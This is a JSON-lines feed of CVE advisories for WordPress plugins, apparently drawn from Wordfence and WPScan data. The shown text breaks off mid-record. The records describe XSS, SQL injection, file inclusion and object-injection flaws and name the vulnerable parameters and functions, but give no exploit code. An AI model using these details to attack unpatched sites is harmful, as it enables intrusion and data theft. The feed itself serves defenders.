{"CVE_ID":"CVE-2024-8802","slug":"clio-grow-form","versionImpact":"1.0.2","description":"The Clio Grow plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10fcfddf-0ed7-471d-86bf-c38e7021c6a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10fcfddf-0ed7-471d-86bf-c38e7021c6a4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clio-grow-form\\\/trunk\\\/includes\\\/class-grow-form-settings.php#L550\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clio-grow-form\\\/trunk\\\/includes\\\/class-grow-form-settings.php#L550\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12332","slug":"wpschoolpress","versionImpact":"2.2.14","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'cid' parameter in all versions up to, and including, 2.2.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Student\/Parent-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/trunk\\\/pages\\\/wpsp-teacher.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0248af2-f9f3-4652-bf6d-b46aa91b66f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0248af2-f9f3-4652-bf6d-b46aa91b66f3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13778","slug":"hmenu","versionImpact":"1.16.5","description":"The Hero Mega Menu - Responsive WordPress Menu Plugin plugin for WordPress is vulnerable to SQL Injection via several functions in all versions up to, and including, 1.16.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bdf04e6-6d9d-41a3-ac54-1a95f4617ea4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bdf04e6-6d9d-41a3-ac54-1a95f4617ea4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4381","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the \u2018$id\u2019 variable of the getSpace() function in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0605bc15-3a97-46f4-8244-29220ed5ab31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0605bc15-3a97-46f4-8244-29220ed5ab31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1661","slug":"display-metadata","versionImpact":"0.4.1","description":"The Display post meta, term meta, comment meta, and user meta plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post metadata in versions up to, and including, 0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-metadata\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-metadata\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f90c0d8-ede6-4f24-870f-19e888238e93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f90c0d8-ede6-4f24-870f-19e888238e93?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3947","slug":"video-conferencing-with-zoom-api","versionImpact":"4.2.1","description":"The Video Conferencing with Zoom plugin for WordPress is vulnerable to Sensitive Information Exposure due to hardcoded encryption key on the 'vczapi_encrypt_decrypt' function in versions up to, and including, 4.2.1. This makes it possible for unauthenticated attackers to decrypt and view the meeting id and password.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Helpers\\\/Encryption.php?rev=2942302\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Helpers\\\/Encryption.php?rev=2942302\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba2515d9-ced0-4b49-87c4-04c8391c2608?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba2515d9-ced0-4b49-87c4-04c8391c2608?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/tags\\\/4.2.1\\\/includes\\\/helpers.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-conferencing-with-zoom-api\\\/tags\\\/4.2.1\\\/includes\\\/helpers.php#L546\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1235","slug":"addons-for-elementor","versionImpact":"8.3.2","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom class field in all versions up to, and including, 8.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70bda4b7-e442-4956-b3cb-8df96043bcde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/trunk\\\/templates\\\/addons\\\/device-slider\\\/loop.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032737%40addons-for-elementor%2Ftrunk&old=3026261%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1533","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML Element in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Requires Elementor and the Phlox theme to be installed.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcd2c5e-4969-4530-b3ab-930c5051d8f1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bcd2c5e-4969-4530-b3ab-930c5051d8f1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auxin-elements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6532","slug":"sheet-to-wp-table-for-google-sheet","versionImpact":"1.0.1","description":"The Sheet to Table Live Sync for Google Sheet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's STWT_Sheet_Table shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f674d3bf-9927-48d9-85c7-34946e8a2eeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f674d3bf-9927-48d9-85c7-34946e8a2eeb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sheet-to-wp-table-for-google-sheet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sheet-to-wp-table-for-google-sheet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sheet-to-wp-table-for-google-sheet\\\/trunk\\\/app\\\/service\\\/post\\\/meta-box.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sheet-to-wp-table-for-google-sheet\\\/trunk\\\/app\\\/service\\\/post\\\/meta-box.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134934\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134934\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7859","slug":"visual-sound","versionImpact":"1.03","description":"The Visual Sound WordPress plugin through 1.03 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88cacd47-d900-478c-b833-c6c55fd4b082\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12327","slug":"lazyload-background-images","versionImpact":"1.0.7","description":"The LazyLoad Background Images plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pblzbg_save_settings() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lazyload-background-images\\\/trunk\\\/admin\\\/plugin-functions.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d57fa9f3-b1c0-4601-96d9-178d0dba1332?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d57fa9f3-b1c0-4601-96d9-178d0dba1332?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13226","slug":"custom-login-page","versionImpact":"2.8.1","description":"The A5 Custom Login Page WordPress plugin through 2.8.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd09fe99-2334-4d6f-8a70-e1cd856b1486\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd09fe99-2334-4d6f-8a70-e1cd856b1486\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13777","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 6.91 via deserialization of untrusted input from the 'margs' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec4633a-0742-4646-accd-cc0b9e01302a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ec4633a-0742-4646-accd-cc0b9e01302a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5286","slug":"bold-page-builder","versionImpact":"5.3.6","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018additional_settings\u2019 parameter in all versions up to, and including, 5.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.6\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.7\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/tags\\\/5.3.7\\\/content_elements\\\/bt_bb_content_slider\\\/bt_bb_content_slider.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae076e4-ad15-4069-be10-f0f4aced4132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae076e4-ad15-4069-be10-f0f4aced4132?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4380","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php files can be uploaded and included, or already exist on the site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3078861b-3a16-4e93-a4f6-5ae885bc0747?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3078861b-3a16-4e93-a4f6-5ae885bc0747?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2987","slug":"wordapp","versionImpact":"1.5.0","description":"The Wordapp plugin for WordPress is vulnerable to authorization bypass due to the use of an insufficiently unique cryptographic signature on the 'wa_pdx_op_config_set' function in versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to change the 'validation_token' in the plugin config, providing access to the plugin's remote control functionalities, such as creating an admin access URL, which can be used for privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/config.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/config.php#L59\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/access.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/access.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/pdx.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordapp\\\/trunk\\\/includes\\\/pdx.php#L64\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80440bfa-4a02-4441-bbdb-52d7dd065a9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80440bfa-4a02-4441-bbdb-52d7dd065a9d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25972","slug":"iksweb","versionImpact":"3.6","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in IKSWEB WordPress ????? plugin <=\u00a03.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/iksweb\\\/wordpress-start-plugin-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/iksweb\\\/wordpress-start-plugin-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3957","slug":"navz-photo-gallery","versionImpact":"1.9","description":"The ACF Photo Gallery Field plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient restriction on the 'apg_profile_update' function in versions up to, and including, 1.9. This makes it possible for authenticated attackers, with subscriber-level permissions or above, to update the user metas arbitrarily. The meta value can only be a string.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/navz-photo-gallery\\\/tags\\\/1.9\\\/includes\\\/acf_photo_gallery_save.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/navz-photo-gallery\\\/tags\\\/1.9\\\/includes\\\/acf_photo_gallery_save.php#L42\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2943404\\\/navz-photo-gallery#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2943404\\\/navz-photo-gallery#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689511e0-1355-4fcb-8a72-d819abc8e9a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689511e0-1355-4fcb-8a72-d819abc8e9a3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1218","slug":"kali-forms","versionImpact":"2.3.41","description":"The Contact Form builder with drag & drop for WordPress \u2013 Kali Forms plugin for WordPress is vulnerable to unauthorized access and modification of data via API due to an inconsistent capability check on several REST endpoints in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with contributor access and higher, to obtain access to or modify forms or entries.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed1aae32-6040-4c42-b8a7-4c3be371a8c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1416","slug":"lead-form-builder","versionImpact":"1.8.9","description":"The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to unauthorized access to functionality due to a missing capability check on several functions in all versions up to, and including, 1.8.9. This makes it possible for unauthenticated attackers to invoke those functions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d087957c-0dd5-46a9-a6bc-85f2f79f43bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d087957c-0dd5-46a9-a6bc-85f2f79f43bd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5656","slug":"google-cse","versionImpact":"1.0.7","description":"The Google CSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 